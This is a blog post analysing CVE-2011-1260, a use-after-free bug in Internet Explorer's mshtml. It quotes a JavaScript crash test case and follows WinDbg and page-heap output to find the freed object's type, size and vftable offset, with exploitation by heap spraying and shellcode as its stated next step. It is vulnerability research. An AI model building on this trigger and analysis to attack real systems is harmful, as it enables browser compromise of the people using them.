Post-mortem Analysis of a Use-After-Free Vulnerability (CVE-2011-1260)

Recently, I've been looking into the exploitation of use-after-free vulnerabilities. This class of bug is very application specific, but armed with just the right amount of knowledge these vulnerabilities can be exploited to bypass most modern OS exploit mitigations. After reading Nephi Johnson's (@d0c_s4vage) excellent article[1] on exploiting an IE use-after-free vulnerability, I decided to ride his coattails and show the steps I used to analyze his proof-of-concept crash code.

As shown in his blog post, here is Nephi's test case that crashes IE:

<html>
    <body>
        <script language='javascript'>
            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAAAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        </script>
    </body>
</html>

Internet Explorer crashes at mshtml!CElement::Doc+0x2

76c.640): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=00000000 ebx=004aedc0 ecx=004e00e9 edx=00000000 esi=0209e138 edi=00000000

eip=6d55c402 esp=0209e10c ebp=0209e124 iopl=0         nv up ei pl zr na pe nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

mshtml!CElement::Doc+0x2:

6d55c402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????

Here is the order of execution leading to the crash:

mshtml!CTreeNode::ComputeFormats+0x42

6d58595a 8b0b            mov     ecx,dword ptr [ebx]

6d58595c e89f6afdff      call    mshtml!CElement::Doc (6d55c400)

mshtml!CElement::Doc:

6d55c400 8b01            mov     eax,dword ptr [ecx]

6d55c402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????

6d55c405 ffd2            call    edx

This is a classic C++ use-after-free vulnerability. IE is trying to call a function within a previously freed object's virtual function table. In the disassembly above, a pointer to some object [EBX] has a pointer to its virtual function table [ECX] that subsequently calls a function at offset 0x70 in its vftable [EAX+0x70].

What we need to find out is what type of object was freed and how many bytes get allocated for that object. That way, we can craft fake objects of that size (using javascript) whose vftable at offset 0x70 point to our shellcode.

Since mshtml!CTreeNode::ComputeFormats+0x42 points to the object in question (in EBX), I set a breakpoint in Windbg on that instruction and got the following:

BP mshtml!CTreeNode::ComputeFormats+0x42 10 ".printf \"Object Pointer:\\t%08x\\nVFTable Pointer:\\t%08x\\nVFTable:\\t\\t%08x\\nObject Type:\\n\", ebx, poi(ebx), poi(poi(ebx)); ln poi(poi(ebx)); g"

0:013> g
Object Pointer:    00608808
VFTable Pointer:    00611890
VFTable:        6caf1e40
Object Type:
(6caf1e40)   mshtml!CObjectElement::`vftable'   |  (6cbf9270)   mshtml!CDummyUnknown::`vftable'
Exact matches:
    mshtml!CObjectElement::`vftable' = <no type information>
Object Pointer:    005c55e8
VFTable Pointer:    005b4338
VFTable:        6cb96670
Object Type:
(6cb96670)   mshtml!CBodyElement::`vftable'   |  (6cbf9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>
Object Pointer:    00608808
VFTable Pointer:    00611890
VFTable:        6caf1e40
Object Type:
(6caf1e40)   mshtml!CObjectElement::`vftable'   |  (6cbf9270)   mshtml!CDummyUnknown::`vftable'
Exact matches:
    mshtml!CObjectElement::`vftable' = <no type information>
Object Pointer:    00608a18
VFTable Pointer:    005c2ac8
VFTable:        6ca47dd8
Object Type:
(6ca47dd8)   mshtml!CAnchorElement::`vftable'   |  (6ca48020)   mshtml!CFontElement::`vftable'
Exact matches:
    mshtml!CAnchorElement::`vftable' = <no type information>
Object Pointer:    00608ac8
VFTable Pointer:    005d6f68
VFTable:        6ca470e0
Object Type:
(6ca470e0)   mshtml!CPhraseElement::`vftable'   |  (6ca47308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
Object Pointer:    00608808
VFTable Pointer:    00610023
VFTable:        00000000
Object Type:
(274.418): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00608808 ecx=00610023 edx=00000000 esi=0207e0b8 edi=00000000
eip=6cbfc402 esp=0207e08c ebp=0207e0a4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc+0x2:
6cbfc402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????

As can be seen above, EBX points to a freed CObjectElement object. How can we know for sure that the object was freed and that it points to a CObjectElement object? Enabling the page heap and user stack traces of every call to malloc and free will do the trick. This technique also allows us to observe the size allocated to CObjectElement.

gflags /i iexplore.exe +hpa +ust

C:\Users\Temp\Desktop>gflags /i iexplore.exe +hpa +ust
Current Registry Settings for iexplore.exe executable are: 02001000
    ust - Create user mode stack trace database
    hpa - Enable page heap

BP mshtml!CTreeNode::ComputeFormats+0x42 12 "!heap -p -a poi(ebx); g"

...
    address 070ccf20 found in
    _DPH_HEAP_ROOT @ 151000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 6ec31d4:          70ccf20               e0 -          70cc000             2000
          mshtml!CObjectElement::`vftable'
    6ed98e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    771e5c4e ntdll!RtlDebugAllocateHeap+0x00000030
    771a7e5e ntdll!RtlpAllocateHeap+0x000000c4
    771734df ntdll!RtlAllocateHeap+0x0000023a
    6bec1da3 mshtml!CObjectElement::CreateElement+0x00000018
    6bf54be9 mshtml!CreateElement+0x00000043
    6bf58961 mshtml!CHtmParse::ParseBeginTag+0x000000e3
    6bf56e93 mshtml!CHtmParse::ParseToken+0x00000082
    6bf575c9 mshtml!CHtmPost::ProcessTokens+0x00000237
    6bf478e8 mshtml!CHtmPost::Exec+0x00000221
    6bf178ae mshtml!CHtmLoad::Init+0x0000033c
    6bfdc444 mshtml!CDwnInfo::SetLoad+0x0000011b
    6bfdc348 mshtml!CDwnCtx::SetLoad+0x0000007a
    6bfdda01 mshtml!CHtmCtx::SetLoad+0x00000013
    6bf5be5f mshtml!CMarkup::Load+0x00000167
    6bf1746e mshtml!CMarkup::Load+0x000000ee
    6bf181c3 mshtml!CDoc::ParseHtmlStream+0x000000ce
    6bf17a5b mshtml!InjectHtmlStream+0x000000fd
    6bf1793e mshtml!HandleHTMLInjection+0x0000005c
    6bf171fa mshtml!CElement::InjectInternal+0x00000307
    6bf1704a mshtml!CElement::InjectCompatBSTR+0x00000046
    6bf1988c mshtml!CElement::put_innerHTML+0x00000040
    6c0572d6 mshtml!GS_BSTR+0x000001ac
    6c04235c mshtml!CBase::ContextInvokeEx+0x000005dc
    6c04c75a mshtml!CElement::ContextInvokeEx+0x0000009d
    6c04c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
    6bff3104 mshtml!PlainInvokeEx+0x000000eb
    6d2fa1bc jscript!IDispatchExInvokeEx2+0x00000104
    6d2fa107 jscript!IDispatchExInvokeEx+0x0000006a
    6d2fa388 jscript!InvokeDispatchEx+0x00000098
    6d2fa432 jscript!VAR::InvokeByName+0x00000139
    6d30d8e8 jscript!VAR::InvokeDispName+0x0000007d
...

# At time of crash, [EBX] points to freed memory:

(3cc.748): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6ce35100 ebx=073cefb0 ecx=07c06f20 edx=00000000 esi=043dde18 edi=00000000
eip=6cabc400 esp=043dddec ebp=043dde04 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
mshtml!CElement::Doc:
6cabc400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07c06f20=????????
0:005> !heap -p -a poi(ebx)
    address 07c06f20 found in
    _DPH_HEAP_ROOT @ 161000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7af2820:          7c06000             2000
    6dec90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77ab641c ntdll!RtlDebugFreeHeap+0x0000002f
    77a77b92 ntdll!RtlpFreeHeap+0x0000005d
    77a42d80 ntdll!RtlFreeHeap+0x00000142
    7762f1cc kernel32!HeapFree+0x00000014
    6cb0ebb9 mshtml!CLineServices::DisposePtr+0x00000016
    70905306 msls31!DestroyILSObjText+0x000001cd
    7090512b msls31!LsDestroyContext+0x00000091
    6cb0f171 mshtml!DeinitLineServices+0x00000015
    6cb1355f mshtml!CLSCache::ReleaseEntry+0x0000003e
    6cadd1d4 mshtml!CLSMeasurer::Deinit+0x00000036
    6cb1b304 mshtml!CDisplay::UpdateView+0x00000208
    6cb18c5c mshtml!CFlowLayout::CommitChanges+0x0000009c
    6cb18b5c mshtml!CDisplay::WaitForRecalc+0x00000131
    6ca91a45 mshtml!CFlowLayout::LineStart+0x00000025
    6ca96625 mshtml!CDisplayPointer::GetLineStart+0x0000008b
    6ca96571 mshtml!CDisplayPointer::IsAtBOL+0x0000004e
    6ca90407 mshtml!CCaretTracker::PositionCaretAt+0x00000128
    6ca90294 mshtml!CCaretTracker::Init2+0x00000053
    6ca8e8b4 mshtml!CSelectionManager::SetCurrentTracker+0x00000026
    6ca8feb5 mshtml!CSelectionManager::CreateTrackerForContext+0x00000335
    6ca8fb99 mshtml!CSelectionManager::SetEditContext+0x0000008d
    6ca8fadd mshtml!CSelectionManager::SetEditContextFromElement+0x0000032d
    6ca95223 mshtml!CSelectionManager::SetInitialEditContext+0x00000064
    6ca95115 mshtml!CSelectionManager::Initialize+0x000001c6
    6ca9558f mshtml!CHTMLEditor::Initialize+0x00000168
    6ca33065 mshtml!CDoc::GetHTMLEditor+0x00000058
    6ca90d6c mshtml!CDoc::CreateServiceW+0x0000038c
    6cacbc6b mshtml!CDoc::QueryService+0x00000166
    7301ff58 IEFRAME!CSelectionServicesListenerBase::_GetHTMLEditServices+0x00000044
    7301fe9c IEFRAME!CSelectionServicesListenerBase::_GetSelectionServices2+0x00000036
    7301fe3a IEFRAME!CSelectionServicesListenerBase::_InstallSelectionServicesListener+0x0000001c

The size that gets allocated to the CObjectElement object is 0xE0. It is also handy to see the call stacks of what allocated and freed the object. The size allocated for the object was determined via dynamic analysis. There's more than one way to skin a cat though. The same information can be gleaned via static analysis. A brief glance of the mshtml!CObjectElement::CreateElement function (which was called in the call stack above) in IDA shows that 0xE0 bytes is allocated for CObjectElement.

According to the disassembly (for CObjectElement::CObjectElement), the actual size of the class is 0xDC. However, 0xE0 is allocated on the heap because the compiler rounded up the size to the nearest DWORD boundary.

Lastly, although it is not always necessary for exploitation, let's determine the actual function that should have been called at the time of the crash. This can be accomplished several ways in Windbg.

0:005> ln poi(mshtml!CObjectElement::`vftable'+0x70)
(6d6bc3d0)   mshtml!CElement::SecurityContext   |  (6d6bc400)   mshtml!CElement::Doc
Exact matches:
    mshtml!CElement::SecurityContext = <no type information>

or:

0:005> ? mshtml!CObjectElement::`vftable'+0x70
Evaluate expression: 1834688176 = 6d5b1eb0
0:005> dds mshtml!CObjectElement::`vftable'
6d5b1e40  6d5b17fa mshtml!CObjectElement::PrivateQueryInterface
6d5b1e44  6d6bc443 mshtml!CElement::PrivateAddRef
6d5b1e48  6d6bc466 mshtml!CElement::PrivateRelease
6d5b1e4c  6d62ce9b mshtml!CObjectElement::`vector deleting destructor'
6d5b1e50  6d644ad5 mshtml!CSite::Init
6d5b1e54  6d62cc29 mshtml!CObjectElement::Passivate
6d5b1e58  6d6bbd95 mshtml!CBase::IsRootObject
6d5b1e5c  6d7585a6 mshtml!CBase::EnumerateTrackedReferences
6d5b1e60  6d81fe3a mshtml!CBase::SetTrackedState
6d5b1e64  6d605743 mshtml!CElement::GetInlineStylePtr
6d5b1e68  6d6e6a10 mshtml!CElement::GetRuntimeStylePtr
6d5b1e6c  6d8b91cf mshtml!CBase::VersionedGetIDsOfNames
6d5b1e70  6d845847 mshtml!CElement::VersionedInvoke
6d5b1e74  6d5b2e75 mshtml!COleSite::VersionedGetDispID
6d5b1e78  6d5b2b83 mshtml!CObjectElement::VersionedInvokeEx
6d5b1e7c  6d764d4e mshtml!CBase::VersionedDeleteMemberByName
6d5b1e80  6d877b83 mshtml!CBase::VersionedDeleteMemberByDispID
6d5b1e84  6d73c532 mshtml!COmWindowProxy::VersionedGetDispID
6d5b1e88  6d52092c mshtml!CBase::VersionedGetMemberName
6d5b1e8c  6d73c532 mshtml!COmWindowProxy::VersionedGetDispID
6d5b1e90  6d8b921e mshtml!CBase::VersionedGetNameSpaceParent
6d5b1e94  6d877ecb mshtml!CBase::GetEnabled
6d5b1e98  6d877ecb mshtml!CBase::GetEnabled
6d5b1e9c  6d9448dd mshtml!COleSite::GetPages
6d5b1ea0  6d94488f mshtml!COleSite::InterfaceSupportsErrorInfo
6d5b1ea4  6d943cbb mshtml!CObjectElement::QueryStatus
6d5b1ea8  6d943d3b mshtml!CObjectElement::Exec
6d5b1eac  6d6c7770 mshtml!CHtmBodyParseCtx::GetHpxEmbed
6d5b1eb0  6d6bc3d0 mshtml!CElement::SecurityContext
6d5b1eb4  6d6e302d mshtml!CBase::SecurityContextAllowsAccess
6d5b1eb8  6d828617 mshtml!CElement::DesignMode
6d5b1ebc  6d5fe445 mshtml!CElement::SupportedCSSLevel

The function that should have been called was mshtml!CElement::SecurityContext.

So to refresh our memories, what was needed to begin exploiting a use-after-free bug?

1) The type of object referenced after being freed
2) The size allocated to the object

There is no magic command that will give you this information and as usual, there is always more than one way to obtain this information. The key is to understand what lead to the crash. The next step is to utilize javascript to declare string variables that will allocate fake objects in the heap that point to attacker controlled shellcode (via heap spraying). This can be accomplished reliably without needing to point to a typical address like 0x0C0C0C0C which serves as both an address in the heap and a NOP slide. More on that in a future blog post...

References:

1. N. Johnson, "Insecticides don't kill bugs, Patch Tuesdays do,"
June 16, 2011, http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html